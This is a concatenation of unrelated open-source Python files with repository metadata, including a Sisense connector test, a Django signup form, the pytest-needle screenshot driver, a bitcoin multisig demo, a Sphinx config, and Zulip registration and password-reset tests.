@mock.patch(f'{__PRIVATE_METHOD_PREFIX}__make_assembled_entry_for_widget')
@mock.patch(f'{__PRIVATE_METHOD_PREFIX}'
f'__make_assembled_entry_for_dashboard')
def test_make_assembled_entries_for_dashboard_should_process_nested_widgets( # noqa: E501
self, mock_make_assembled_entry_for_dashboard,
mock_make_assembled_entry_for_widget):
widget = self.__make_fake_widget()
dashboard = self.__make_fake_dashboard()
dashboard['widgets'] = [widget]
tag_templates_dict = {}
assembled_entries = self.__factory\
._AssembledEntryFactory__make_assembled_entries_for_dashboard(
dashboard, tag_templates_dict)
self.assertEqual(2, len(assembled_entries))
mock_make_assembled_entry_for_dashboard.assert_called_once_with(
dashboard, tag_templates_dict)
mock_make_assembled_entry_for_widget.assert_called_once_with(
widget, tag_templates_dict)
def test_make_assembled_entry_for_dashboard_should_make_entry_and_tags(
self):
dashboard = self.__make_fake_dashboard()
dashboard_tag_template = datacatalog.TagTemplate()
dashboard_tag_template.name = 'tagTemplates/sisense_dashboard_metadata'
jaql_tag_template = datacatalog.TagTemplate()
jaql_tag_template.name = 'tagTemplates/sisense_jaql_metadata'
tag_templates_dict = {
'sisense_dashboard_metadata': dashboard_tag_template,
'sisense_jaql_metadata': jaql_tag_template
}
fake_entry = ('test-dashboard', {})
entry_factory = self.__mock_entry_factory
entry_factory.make_entry_for_dashboard.return_value = fake_entry
tag_factory = self.__mock_tag_factory
fake_dashboard_tag = datacatalog.Tag()
fake_dashboard_tag.template = 'tagTemplates/sisense_dashboard_metadata'
tag_factory.make_tag_for_dashboard.return_value = fake_dashboard_tag
fake_filter_tag = datacatalog.Tag()
fake_filter_tag.template = 'tagTemplates/sisense_jaql_metadata'
tag_factory.make_tags_for_dashboard_filters.return_value = [
fake_filter_tag
]
assembled_entry = self.__factory\
._AssembledEntryFactory__make_assembled_entry_for_dashboard(
dashboard, tag_templates_dict)
self.assertEqual('test-dashboard', assembled_entry.entry_id)
self.assertEqual({}, assembled_entry.entry)
entry_factory.make_entry_for_dashboard.assert_called_once_with(
dashboard)
tags = assembled_entry.tags
self.assertEqual(2, len(tags))
self.assertEqual('tagTemplates/sisense_dashboard_metadata',
tags[0].template)
self.assertEqual('tagTemplates/sisense_jaql_metadata',
tags[1].template)
tag_factory.make_tag_for_dashboard.assert_called_once_with(
dashboard_tag_template, dashboard)
tag_factory.make_tags_for_dashboard_filters.assert_called_once_with(
jaql_tag_template, dashboard)
def test_make_assembled_entry_for_widget_should_make_entry_and_tags(self):
widget = self.__make_fake_widget()
widget_tag_template = datacatalog.TagTemplate()
widget_tag_template.name = 'tagTemplates/sisense_widget_metadata'
jaql_tag_template = datacatalog.TagTemplate()
jaql_tag_template.name = 'tagTemplates/sisense_jaql_metadata'
tag_templates_dict = {
'sisense_widget_metadata': widget_tag_template,
'sisense_jaql_metadata': jaql_tag_template
}
fake_entry = ('test-widget', {})
entry_factory = self.__mock_entry_factory
entry_factory.make_entry_for_widget.return_value = fake_entry
tag_factory = self.__mock_tag_factory
fake_widget_tag = datacatalog.Tag()
fake_widget_tag.template = 'tagTemplates/sisense_widget_metadata'
tag_factory.make_tag_for_widget.return_value = fake_widget_tag
fake_field_tag = datacatalog.Tag()
fake_field_tag.template = 'tagTemplates/sisense_jaql_metadata'
tag_factory.make_tags_for_widget_fields.return_value = [fake_field_tag]
fake_filter_tag = datacatalog.Tag()
fake_filter_tag.template = 'tagTemplates/sisense_jaql_metadata'
tag_factory.make_tags_for_widget_filters.return_value = [
fake_filter_tag
]
assembled_entry = self.__factory\
._AssembledEntryFactory__make_assembled_entry_for_widget(
widget, tag_templates_dict)
self.assertEqual('test-widget', assembled_entry.entry_id)
self.assertEqual({}, assembled_entry.entry)
entry_factory.make_entry_for_widget.assert_called_once_with(widget)
tags = assembled_entry.tags
self.assertEqual(3, len(tags))
self.assertEqual('tagTemplates/sisense_widget_metadata',
tags[0].template)
self.assertEqual('tagTemplates/sisense_jaql_metadata',
tags[1].template)
self.assertEqual('tagTemplates/sisense_jaql_metadata',
tags[2].template)
tag_factory.make_tag_for_widget.assert_called_once_with(
widget_tag_template, widget)
tag_factory.make_tags_for_widget_fields.assert_called_once_with(
jaql_tag_template, widget)
tag_factory.make_tags_for_widget_filters.assert_called_once_with(
jaql_tag_template, widget)
@classmethod
def __make_fake_folder(cls) -> Dict[str, Any]:
return {
'oid': 'test-folder',
'type': 'folder',
'name': 'Test folder',
}
@classmethod
def __make_fake_dashboard(cls) -> Dict[str, Any]:
return {
'oid': 'test-dashboard',
'type': 'dashboard',
'title': 'Test dashboard',
}
@classmethod
def __make_fake_widget(cls) -> Dict[str, Any]:
return {
'oid': 'test-widget',
'type': 'indicator',
'title': 'Test widget',
}
|
GoogleCloudPlatform/datacatalog-connectors-bi
|
google-datacatalog-sisense-connector/tests/google/datacatalog_connectors/sisense/prepare/assembled_entry_factory_test.py
|
Python
|
apache-2.0
| 13,804 | 0 |
from django import forms
from django.contrib.auth.models import User
from django.forms import ModelForm
from django.db import models
# Create your models here.
#EDICION DE MODELO USER
User.add_to_class('usuario_sico', models.CharField(max_length=10, null=False, blank=False))
User.add_to_class('contrasenia_sico', models.CharField(max_length=10, null=False, blank=False))
#User.add_to_class('amigos', models.ManyToManyField('self', symmetrical=True, blank=True))
#FORMULARIOS
class SignUpForm(ModelForm):
class Meta:
model = User
fields = ['username', 'password', 'email', 'first_name', 'last_name', 'usuario_sico', 'contrasenia_sico']
widgets = {
'password': forms.PasswordInput(),
'contrasenia_sico': forms.PasswordInput(),
}
|
Titulacion-Sistemas/PracticasDjango
|
usuarios_logueados/usuarios/models.py
|
Python
|
gpl-2.0
| 791 | 0.011378 |
"""pytest_needle.driver
.. codeauthor:: John Lane <jlane@fanthreesixty.com>
"""
import base64
from errno import EEXIST
import math
import os
import re
import sys
import pytest
from needle.cases import import_from_string
from needle.engines.pil_engine import ImageDiff
from PIL import Image, ImageDraw, ImageColor
from selenium.webdriver.remote.webdriver import WebElement
from pytest_needle.exceptions import ImageMismatchException, MissingBaselineException, MissingEngineException
if sys.version_info >= (3, 0):
from io import BytesIO as IOClass
# Ignoring since basetring is not redefined if running on python3
basestring = str # pylint: disable=W0622,C0103
else:
try:
from cStringIO import StringIO as IOClass
except ImportError:
from StringIO import StringIO as IOClass
DEFAULT_BASELINE_DIR = os.path.realpath(os.path.join(os.getcwd(), 'screenshots', 'baseline'))
DEFAULT_OUTPUT_DIR = os.path.realpath(os.path.join(os.getcwd(), 'screenshots'))
DEFAULT_ENGINE = 'needle.engines.pil_engine.Engine'
DEFAULT_VIEWPORT_SIZE = '1024x768'
class NeedleDriver(object): # pylint: disable=R0205
"""NeedleDriver instance
"""
ENGINES = {
'pil': DEFAULT_ENGINE,
'imagemagick': 'needle.engines.imagemagick_engine.Engine',
'perceptualdiff': 'needle.engines.perceptualdiff_engine.Engine'
}
def __init__(self, driver, **kwargs):
self.options = kwargs
self.driver = driver
# Set viewport position, size
self.driver.set_window_position(0, 0)
self.set_viewport()
@staticmethod
def _create_dir(directory):
"""Recursively create a directory
.. note:: From needle
https://github.com/python-needle/needle/blob/master/needle/cases.py#L125
:param str directory: Directory path to create
:return:
"""
try:
os.makedirs(directory)
except OSError as err:
if err.errno == EEXIST and os.path.isdir(directory):
return
raise err
def _find_element(self, element_or_selector=None):
"""Returns an element
:param element_or_selector: WebElement or tuple containing selector ex. ('id', 'mainPage')
:return:
"""
if isinstance(element_or_selector, tuple): # pylint: disable=R1705
elements = self.driver.find_elements(*element_or_selector)
return elements[0] if elements else None
elif isinstance(element_or_selector, WebElement):
return element_or_selector
raise ValueError("element_or_selector must be a WebElement or tuple selector")
@staticmethod
def _get_element_dimensions(element):
"""Returns an element's position and size
:param WebElement element: Element to get dimensions for
:return:
"""
if isinstance(element, WebElement):
# Get dimensions of element
location = element.location
size = element.size
return {
'top': int(location['y']),
'left': int(location['x']),
'width': int(size['width']),
'height': int(size['height'])
}
raise ValueError("element must be a WebElement")
def _get_element_rect(self, element):
"""Returns the two points that define the rectangle
:param WebElement element: Element to get points for
:return:
"""
dimensions = self._get_element_dimensions(element)
if dimensions:
return (
dimensions['left'],
dimensions['top'],
(dimensions['left'] + dimensions['width']),
(dimensions['top'] + dimensions['height'])
)
return ()
@staticmethod
def _get_ratio(image_size, window_size):
return max((
math.ceil(image_size[0] / float(window_size[0])),
math.ceil(image_size[1] / float(window_size[1]))
))
def _get_window_size(self):
window_size = self.driver.get_window_size()
return window_size['width'], window_size['height']
@property
def baseline_dir(self):
"""Return baseline image path
:return:
:rtype: str
"""
return self.options.get('baseline_dir', DEFAULT_BASELINE_DIR)
@baseline_dir.setter
def baseline_dir(self, value):
"""Set baseline image directory
:param str value: File path
:return:
"""
assert isinstance(value, basestring)
self.options['baseline_dir'] = value
@property
def cleanup_on_success(self):
"""Returns True, if cleanup on success flag is set
:return:
:rtype: bool
"""
return self.options.get('cleanup_on_success', False)
@cleanup_on_success.setter
def cleanup_on_success(self, value):
"""Set cleanup on success flag
:param bool value: Cleanup on success flag
:return:
"""
self.options['cleanup_on_success'] = bool(value)
@property
def engine(self):
"""Return image processing engine
:return:
"""
return import_from_string(self.engine_class)()
@property
def engine_class(self):
"""Return image processing engine name
:return:
:rtype: str
"""
return self.ENGINES.get(self.options.get('needle_engine', 'pil').lower(), DEFAULT_ENGINE)
@engine_class.setter
def engine_class(self, value):
"""Set image processing engine name
:param str value: Image processing engine name (pil, imagemagick, perceptualdiff)
:return:
"""
assert value.lower() in self.ENGINES
self.options['needle_engine'] = value.lower()
def get_screenshot(self, element=None):
"""Returns screenshot image
:param WebElement element: Crop image to element (Optional)
:return:
"""
stream = IOClass(base64.b64decode(self.driver.get_screenshot_as_base64().encode('ascii')))
image = Image.open(stream).convert('RGB')
if isinstance(element, WebElement):
window_size = self._get_window_size()
image_size = image.size
# Get dimensions of element
dimensions = self._get_element_dimensions(element)
if not image_size == (dimensions['width'], dimensions['height']):
ratio = self._get_ratio(image_size, window_size)
return image.crop([point * ratio for point in self._get_element_rect(element)])
return image
def get_screenshot_as_image(self, element=None, exclude=None):
"""
:param WebElement element: Crop image to element (Optional)
:param list exclude: Elements to exclude
:return:
"""
image = self.get_screenshot(element)
# Mask elements in exclude if element is not included
if isinstance(exclude, (list, tuple)) and exclude and not element:
# Gather all elements to exclude
elements = [self._find_element(element) for element in exclude]
elements = [element for element in elements if element]
canvas = ImageDraw.Draw(image)
window_size = self._get_window_size()
image_size = image.size
ratio = self._get_ratio(image_size, window_size)
for ele in elements:
canvas.rectangle([point * ratio for point in self._get_element_rect(ele)],
fill=ImageColor.getrgb('black'))
del canvas
return image
def assert_screenshot(self, file_path, element_or_selector=None, threshold=0, exclude=None):
"""Fail if new fresh image is too dissimilar from the baseline image
.. note:: From needle
https://github.com/python-needle/needle/blob/master/needle/cases.py#L161
:param str file_path: File name for baseline image
:param element_or_selector: WebElement or tuple containing selector ex. ('id', 'mainPage')
:param threshold: Distance threshold
:param list exclude: Elements or element selectors for areas to exclude
:return:
"""
element = self._find_element(element_or_selector) if element_or_selector else None
# Get baseline screenshot
self._create_dir(self.baseline_dir)
baseline_image = os.path.join(self.baseline_dir, '%s.png' % file_path) \
if isinstance(file_path, basestring) else Image.open(file_path).convert('RGB')
# Take screenshot and exit if in baseline saving mode
if self.save_baseline:
self.get_screenshot_as_image(element, exclude=exclude).save(baseline_image)
return
# Get fresh screenshot
self._create_dir(self.output_dir)
fresh_image = self.get_screenshot_as_image(element, exclude=exclude)
fresh_image_file = os.path.join(self.output_dir, '%s.png' % file_path)
fresh_image.save(fresh_image_file)
# Error if there is not a baseline image to compare
if not self.save_baseline and not isinstance(file_path, basestring) and not os.path.exists(baseline_image):
raise IOError('The baseline screenshot %s does not exist. You might want to '
're-run this test in baseline-saving mode.' % baseline_image)
# Compare images
if isinstance(baseline_image, basestring):
try:
self.engine.assertSameFiles(fresh_image_file, baseline_image, threshold)
except AssertionError as err:
msg = getattr(err, 'message', err.args[0] if err.args else "")
args = err.args[1:] if len(err.args) > 1 else []
raise ImageMismatchException(msg, baseline_image, fresh_image_file, args)
except EnvironmentError:
msg = "Missing baseline '{}'. Please run again with --needle-save-baseline".format(baseline_image)
raise MissingBaselineException(msg)
except ValueError as err:
if self.options['needle_engine'] == 'imagemagick':
msg = "It appears {0} is not installed. Please verify {0} is installed or choose a different engine"
raise MissingEngineException(msg.format(self.options['needle_engine']))
raise err
finally:
if self.cleanup_on_success:
os.remove(fresh_image_file)
else:
diff = ImageDiff(fresh_image, baseline_image)
distance = abs(diff.get_distance())
if distance > threshold:
pytest.fail('Fail: New screenshot did not match the baseline (by a distance of %.2f)' % distance)
@property
def output_dir(self):
"""Return output image path
:return:
:rtype: str
"""
return self.options.get('output_dir', DEFAULT_OUTPUT_DIR)
@output_dir.setter
def output_dir(self, value):
"""Set output image directory
:param str value: File path
:return:
"""
assert isinstance(value, basestring)
self.options['output_dir'] = value
@property
def save_baseline(self):
"""Returns True, if save baseline flag is set
:return:
:rtype: bool
"""
return self.options.get('save_baseline', False)
@save_baseline.setter
def save_baseline(self, value):
"""Set save baseline flag
:param bool value: Save baseline flag
:return:
"""
self.options['save_baseline'] = bool(value)
def set_viewport(self):
"""Set viewport width, height based off viewport size
:return:
"""
if self.viewport_size.lower() == 'fullscreen':
self.driver.maximize_window()
return
viewport_size = re.match(r'(?P<width>\d+)\s?[xX]\s?(?P<height>\d+)', self.viewport_size)
viewport_dimensions = (viewport_size.group('width'), viewport_size.group('height')) if viewport_size \
else DEFAULT_VIEWPORT_SIZE.split('x')
self.driver.set_window_size(*[int(dimension) for dimension in viewport_dimensions])
@property
def viewport_size(self):
"""Return setting for browser window size
:return:
:rtype: str
"""
return self.options.get('viewport_size', DEFAULT_VIEWPORT_SIZE)
@viewport_size.setter
def viewport_size(self, value):
"""Set setting for browser window size
:param value: Browser window size, as string or (x,y)
:return:
"""
assert isinstance(value, (basestring, list, tuple))
assert len(value) == 2 and all([isinstance(i, int) for i in value]) \
if isinstance(value, (list, tuple)) else True
self.options['viewport_size'] = value if isinstance(value, basestring) else '{}x{}'.format(*value)
|
jlane9/pytest-needle
|
pytest_needle/driver.py
|
Python
|
mit
| 13,087 | 0.00214 |
#!/usr/bin/env/ python
'''
Title - Create multi-signature address
'''
# Import bitcoin
from bitcoin import *
my_private_key1 = random_key()
my_private_key2 = random_key()
my_private_key3 = random_key()
print("Private Key1: %s\n" % my_private_key1)
print("Private Key2: %s\n" % my_private_key2)
print("Private Key3: %s\n" % my_private_key3)
print('\n');
# Generate Public Key:
my_public_key1 = privtopub(my_private_key1)
my_public_key2 = privtopub(my_private_key2)
my_public_key3 = privtopub(my_private_key3)
print("Public Key1: %s\n" % my_public_key1)
print("Public Key2: %s\n" % my_public_key2)
print("Public Key3: %s\n" % my_public_key3)
print('\n');
# Create Multi-Sig Address:
my_multi_sig = mk_multisig_script(my_public_key1, my_public_key2, my_public_key3, 2, 3)
my_multisig_address = scriptaddr(my_multi_sig)
print("Multi Signature Address %s\n" % my_multisig_address)
|
codevan/codevan
|
BitcoinPlay/multisig_address.py
|
Python
|
apache-2.0
| 911 | 0.004391 |
"""
@Author: Kiran Gurajala & Alex Lee
@Project: Project Automail
@Version: 1.0
"""
# Required imports
import struct
# Utils
def pack(fmt, *args):
return struct.pack('<' + fmt, *args)
def unpack(fmt, *args):
return struct.unpack('<' + fmt, *args)
def multichr(values):
return ''.join(map(chr, values))
def multiord(values):
return map(ord, values)
|
ThermoNuclearPanda/Project_Automail
|
Python Files/utilities.py
|
Python
|
mit
| 358 | 0.022346 |
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
"""JabberHooky"""
__name__ = "jabberhooky"
__author__ = 'Shane R. Spencer'
__email__ = "shane@bogomip.com"
__license__ = 'MIT'
__copyright__ = '2012 Shane R. Spencer'
__version__ = '0.0.1'
__status__ = "Prototype"
|
whardier/jabberhooky
|
jabberhooky/__init__.py
|
Python
|
mit
| 263 | 0.003802 |
import sys, os
import vecrec
## General
project = u'vecrec'
copyright = u'2015, Kale Kundert'
version = vecrec.__version__
release = vecrec.__version__
master_doc = 'index'
source_suffix = '.rst'
templates_path = ['templates']
exclude_patterns = ['build']
default_role = 'any'
pygments_style = 'sphinx'
## Extensions
extensions = [
'autoclasstoc',
'sphinx.ext.autodoc',
'sphinx.ext.autosummary',
'sphinx.ext.viewcode',
'sphinx.ext.intersphinx',
'sphinx_rtd_theme',
]
intersphinx_mapping = { #
'pyglet': ('http://pyglet.readthedocs.io/en/latest', None),
'pygame': ('https://www.pygame.org/docs', None),
}
autosummary_generate = True
autodoc_default_options = {
'exclude-members': '__dict__,__weakref__,__module__',
}
html_theme = "sphinx_rtd_theme"
#html_static_path = ['static']
|
kxgames/vecrec
|
docs/conf.py
|
Python
|
mit
| 857 | 0.007001 |
import datetime
import re
import time
import urllib
from typing import Any, Dict, List, Optional, Sequence
from unittest.mock import MagicMock, patch
from urllib.parse import urlencode
import orjson
from django.conf import settings
from django.contrib.auth.views import PasswordResetConfirmView
from django.contrib.contenttypes.models import ContentType
from django.core.exceptions import ValidationError
from django.http import HttpResponse
from django.test import Client, override_settings
from django.urls import reverse
from django.utils.timezone import now as timezone_now
from confirmation import settings as confirmation_settings
from confirmation.models import (
Confirmation,
ConfirmationKeyException,
MultiuseInvite,
confirmation_url,
create_confirmation_link,
generate_key,
get_object_from_key,
one_click_unsubscribe_link,
)
from corporate.lib.stripe import get_latest_seat_count
from zerver.context_processors import common_context
from zerver.decorator import do_two_factor_login
from zerver.forms import HomepageForm, check_subdomain_available
from zerver.lib.actions import (
add_new_user_history,
change_user_is_active,
do_add_default_stream,
do_change_full_name,
do_change_realm_subdomain,
do_change_user_role,
do_create_default_stream_group,
do_create_realm,
do_create_user,
do_deactivate_realm,
do_deactivate_user,
do_get_user_invites,
do_invite_users,
do_set_realm_property,
get_default_streams_for_realm,
get_stream,
)
from zerver.lib.email_notifications import enqueue_welcome_emails, followup_day2_email_delay
from zerver.lib.initial_password import initial_password
from zerver.lib.mobile_auth_otp import (
ascii_to_hex,
hex_to_ascii,
is_valid_otp,
otp_decrypt_api_key,
otp_encrypt_api_key,
xor_hex_strings,
)
from zerver.lib.name_restrictions import is_disposable_domain
from zerver.lib.rate_limiter import add_ratelimit_rule, remove_ratelimit_rule
from zerver.lib.send_email import (
EmailNotDeliveredException,
FromAddress,
deliver_scheduled_emails,
send_future_email,
)
from zerver.lib.stream_subscription import get_stream_subscriptions_for_user
from zerver.lib.streams import create_stream_if_needed
from zerver.lib.subdomains import is_root_domain_available
from zerver.lib.test_classes import ZulipTestCase
from zerver.lib.test_helpers import (
avatar_disk_path,
cache_tries_captured,
find_key_by_email,
get_test_image_file,
load_subdomain_token,
message_stream_count,
most_recent_message,
most_recent_usermessage,
queries_captured,
reset_emails_in_zulip_realm,
)
from zerver.models import (
CustomProfileField,
CustomProfileFieldValue,
DefaultStream,
Message,
PreregistrationUser,
Realm,
RealmAuditLog,
Recipient,
ScheduledEmail,
Stream,
Subscription,
UserMessage,
UserProfile,
flush_per_request_caches,
get_realm,
get_system_bot,
get_user,
get_user_by_delivery_email,
)
from zerver.views.auth import redirect_and_log_into_subdomain, start_two_factor_auth
from zerver.views.development.registration import confirmation_key
from zerver.views.invite import get_invitee_emails_set
from zproject.backends import ExternalAuthDataDict, ExternalAuthResult
class RedirectAndLogIntoSubdomainTestCase(ZulipTestCase):
def test_data(self) -> None:
realm = get_realm("zulip")
user_profile = self.example_user("hamlet")
name = user_profile.full_name
email = user_profile.delivery_email
response = redirect_and_log_into_subdomain(ExternalAuthResult(user_profile=user_profile))
data = load_subdomain_token(response)
self.assertDictEqual(
data,
{"full_name": name, "email": email, "subdomain": realm.subdomain, "is_signup": False},
)
data_dict = ExternalAuthDataDict(is_signup=True, multiuse_object_key="key")
response = redirect_and_log_into_subdomain(
ExternalAuthResult(user_profile=user_profile, data_dict=data_dict)
)
data = load_subdomain_token(response)
self.assertDictEqual(
data,
{
"full_name": name,
"email": email,
"subdomain": realm.subdomain,
# the email has an account at the subdomain,
# so is_signup get overridden to False:
"is_signup": False,
"multiuse_object_key": "key",
},
)
data_dict = ExternalAuthDataDict(
email=self.nonreg_email("alice"),
full_name="Alice",
subdomain=realm.subdomain,
is_signup=True,
full_name_validated=True,
multiuse_object_key="key",
)
response = redirect_and_log_into_subdomain(ExternalAuthResult(data_dict=data_dict))
data = load_subdomain_token(response)
self.assertDictEqual(
data,
{
"full_name": "Alice",
"email": self.nonreg_email("alice"),
"full_name_validated": True,
"subdomain": realm.subdomain,
"is_signup": True,
"multiuse_object_key": "key",
},
)
class DeactivationNoticeTestCase(ZulipTestCase):
def test_redirection_for_deactivated_realm(self) -> None:
realm = get_realm("zulip")
realm.deactivated = True
realm.save(update_fields=["deactivated"])
for url in ("/register/", "/login/"):
result = self.client_get(url)
self.assertEqual(result.status_code, 302)
self.assertIn("deactivated", result.url)
def test_redirection_for_active_realm(self) -> None:
for url in ("/register/", "/login/"):
result = self.client_get(url)
self.assertEqual(result.status_code, 200)
def test_deactivation_notice_when_realm_is_active(self) -> None:
result = self.client_get("/accounts/deactivated/")
self.assertEqual(result.status_code, 302)
self.assertIn("login", result.url)
def test_deactivation_notice_when_deactivated(self) -> None:
realm = get_realm("zulip")
realm.deactivated = True
realm.save(update_fields=["deactivated"])
result = self.client_get("/accounts/deactivated/")
self.assertIn("Zulip Dev, has been deactivated.", result.content.decode())
self.assertNotIn("It has moved to", result.content.decode())
def test_deactivation_notice_when_deactivated_and_deactivated_redirect_is_set(self) -> None:
realm = get_realm("zulip")
realm.deactivated = True
realm.deactivated_redirect = "http://example.zulipchat.com"
realm.save(update_fields=["deactivated", "deactivated_redirect"])
result = self.client_get("/accounts/deactivated/")
self.assertIn(
'It has moved to <a href="http://example.zulipchat.com">http://example.zulipchat.com</a>.',
result.content.decode(),
)
def test_deactivation_notice_when_realm_subdomain_is_changed(self) -> None:
realm = get_realm("zulip")
do_change_realm_subdomain(realm, "new-subdomain-name", acting_user=None)
result = self.client_get("/accounts/deactivated/")
self.assertIn(
'It has moved to <a href="http://new-subdomain-name.testserver">http://new-subdomain-name.testserver</a>.',
result.content.decode(),
)
def test_deactivated_redirect_field_of_placeholder_realms_are_modified_on_changing_subdomain_multiple_times(
self,
) -> None:
realm = get_realm("zulip")
do_change_realm_subdomain(realm, "new-name-1", acting_user=None)
result = self.client_get("/accounts/deactivated/")
self.assertIn(
'It has moved to <a href="http://new-name-1.testserver">http://new-name-1.testserver</a>.',
result.content.decode(),
)
realm = get_realm("new-name-1")
do_change_realm_subdomain(realm, "new-name-2", acting_user=None)
result = self.client_get("/accounts/deactivated/")
self.assertIn(
'It has moved to <a href="http://new-name-2.testserver">http://new-name-2.testserver</a>.',
result.content.decode(),
)
class AddNewUserHistoryTest(ZulipTestCase):
def test_add_new_user_history_race(self) -> None:
"""Sends a message during user creation"""
# Create a user who hasn't had historical messages added
realm = get_realm("zulip")
stream = Stream.objects.get(realm=realm, name="Denmark")
DefaultStream.objects.create(stream=stream, realm=realm)
# Make sure at least 3 messages are sent to Denmark and it's a default stream.
message_id = self.send_stream_message(self.example_user("hamlet"), stream.name, "test 1")
self.send_stream_message(self.example_user("hamlet"), stream.name, "test 2")
self.send_stream_message(self.example_user("hamlet"), stream.name, "test 3")
with patch("zerver.lib.actions.add_new_user_history"):
self.register(self.nonreg_email("test"), "test")
user_profile = self.nonreg_user("test")
subs = Subscription.objects.select_related("recipient").filter(
user_profile=user_profile, recipient__type=Recipient.STREAM
)
streams = Stream.objects.filter(id__in=[sub.recipient.type_id for sub in subs])
# Sent a message afterwards to trigger a race between message
# sending and `add_new_user_history`.
race_message_id = self.send_stream_message(
self.example_user("hamlet"), streams[0].name, "test"
)
# Overwrite ONBOARDING_UNREAD_MESSAGES to 2
ONBOARDING_UNREAD_MESSAGES = 2
with patch("zerver.lib.actions.ONBOARDING_UNREAD_MESSAGES", ONBOARDING_UNREAD_MESSAGES):
add_new_user_history(user_profile, streams)
# Our first message is in the user's history
self.assertTrue(
UserMessage.objects.filter(user_profile=user_profile, message_id=message_id).exists()
)
# The race message is in the user's history and marked unread.
self.assertTrue(
UserMessage.objects.filter(
user_profile=user_profile, message_id=race_message_id
).exists()
)
self.assertFalse(
UserMessage.objects.get(
user_profile=user_profile, message_id=race_message_id
).flags.read.is_set
)
# Verify that the ONBOARDING_UNREAD_MESSAGES latest messages
# that weren't the race message are marked as unread.
latest_messages = (
UserMessage.objects.filter(
user_profile=user_profile,
message__recipient__type=Recipient.STREAM,
)
.exclude(message_id=race_message_id)
.order_by("-message_id")[0:ONBOARDING_UNREAD_MESSAGES]
)
self.assert_length(latest_messages, 2)
for msg in latest_messages:
self.assertFalse(msg.flags.read.is_set)
# Verify that older messages are correctly marked as read.
older_messages = (
UserMessage.objects.filter(
user_profile=user_profile,
message__recipient__type=Recipient.STREAM,
)
.exclude(message_id=race_message_id)
.order_by("-message_id")[ONBOARDING_UNREAD_MESSAGES : ONBOARDING_UNREAD_MESSAGES + 1]
)
self.assertGreater(len(older_messages), 0)
for msg in older_messages:
self.assertTrue(msg.flags.read.is_set)
def test_auto_subbed_to_personals(self) -> None:
"""
Newly created users are auto-subbed to the ability to receive
personals.
"""
test_email = self.nonreg_email("test")
self.register(test_email, "test")
user_profile = self.nonreg_user("test")
old_messages_count = message_stream_count(user_profile)
self.send_personal_message(user_profile, user_profile)
new_messages_count = message_stream_count(user_profile)
self.assertEqual(new_messages_count, old_messages_count + 1)
recipient = Recipient.objects.get(type_id=user_profile.id, type=Recipient.PERSONAL)
message = most_recent_message(user_profile)
self.assertEqual(message.recipient, recipient)
with patch("zerver.models.get_display_recipient", return_value="recip"):
self.assertEqual(
str(message),
"<Message: recip / / "
"<UserProfile: {} {}>>".format(user_profile.email, user_profile.realm),
)
user_message = most_recent_usermessage(user_profile)
self.assertEqual(
str(user_message),
f"<UserMessage: recip / {user_profile.email} ([])>",
)
class InitialPasswordTest(ZulipTestCase):
def test_none_initial_password_salt(self) -> None:
with self.settings(INITIAL_PASSWORD_SALT=None):
self.assertIsNone(initial_password("test@test.com"))
class PasswordResetTest(ZulipTestCase):
"""
Log in, reset password, log out, log in with new password.
"""
def get_reset_mail_body(self, subdomain: str = "zulip") -> str:
from django.core.mail import outbox
[message] = outbox
self.assertEqual(self.email_envelope_from(message), settings.NOREPLY_EMAIL_ADDRESS)
self.assertRegex(
self.email_display_from(message),
fr"^Zulip Account Security <{self.TOKENIZED_NOREPLY_REGEX}>\Z",
)
self.assertIn(f"{subdomain}.testserver", message.extra_headers["List-Id"])
return message.body
def test_password_reset(self) -> None:
user = self.example_user("hamlet")
email = user.delivery_email
old_password = initial_password(email)
assert old_password is not None
self.login_user(user)
# test password reset template
result = self.client_get("/accounts/password/reset/")
self.assert_in_response("Reset your password", result)
# start the password reset process by supplying an email address
result = self.client_post("/accounts/password/reset/", {"email": email})
# check the redirect link telling you to check mail for password reset link
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith("/accounts/password/reset/done/"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email in a few minutes to finish the process.", result)
# Check that the password reset email is from a noreply address.
body = self.get_reset_mail_body()
self.assertIn("reset your password", body)
# Visit the password reset link.
password_reset_url = self.get_confirmation_url_from_outbox(
email, url_pattern=settings.EXTERNAL_HOST + r"(\S\S+)"
)
result = self.client_get(password_reset_url)
self.assertEqual(result.status_code, 302)
self.assertTrue(result.url.endswith(f"/{PasswordResetConfirmView.reset_url_token}/"))
final_reset_url = result.url
result = self.client_get(final_reset_url)
self.assertEqual(result.status_code, 200)
# Reset your password
with self.settings(PASSWORD_MIN_LENGTH=3, PASSWORD_MIN_GUESSES=1000):
# Verify weak passwords don't work.
result = self.client_post(
final_reset_url, {"new_password1": "easy", "new_password2": "easy"}
)
self.assert_in_response("The password is too weak.", result)
result = self.client_post(
final_reset_url, {"new_password1": "f657gdGGk9", "new_password2": "f657gdGGk9"}
)
# password reset succeeded
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith("/password/done/"))
# log back in with new password
self.login_by_email(email, password="f657gdGGk9")
user_profile = self.example_user("hamlet")
self.assert_logged_in_user_id(user_profile.id)
# make sure old password no longer works
self.assert_login_failure(email, password=old_password)
def test_password_reset_for_non_existent_user(self) -> None:
email = "nonexisting@mars.com"
# start the password reset process by supplying an email address
result = self.client_post("/accounts/password/reset/", {"email": email})
# check the redirect link telling you to check mail for password reset link
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith("/accounts/password/reset/done/"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email in a few minutes to finish the process.", result)
# Check that the password reset email is from a noreply address.
body = self.get_reset_mail_body()
self.assertIn("Somebody (possibly you) requested a new password", body)
self.assertIn("You do not have an account", body)
self.assertIn("safely ignore", body)
self.assertNotIn("reset your password", body)
self.assertNotIn("deactivated", body)
def test_password_reset_for_deactivated_user(self) -> None:
user_profile = self.example_user("hamlet")
email = user_profile.delivery_email
do_deactivate_user(user_profile, acting_user=None)
# start the password reset process by supplying an email address
result = self.client_post("/accounts/password/reset/", {"email": email})
# check the redirect link telling you to check mail for password reset link
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith("/accounts/password/reset/done/"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email in a few minutes to finish the process.", result)
# Check that the password reset email is from a noreply address.
body = self.get_reset_mail_body()
self.assertIn("Somebody (possibly you) requested a new password", body)
self.assertIn("has been deactivated", body)
self.assertIn("safely ignore", body)
self.assertNotIn("reset your password", body)
self.assertNotIn("not have an account", body)
def test_password_reset_with_deactivated_realm(self) -> None:
user_profile = self.example_user("hamlet")
email = user_profile.delivery_email
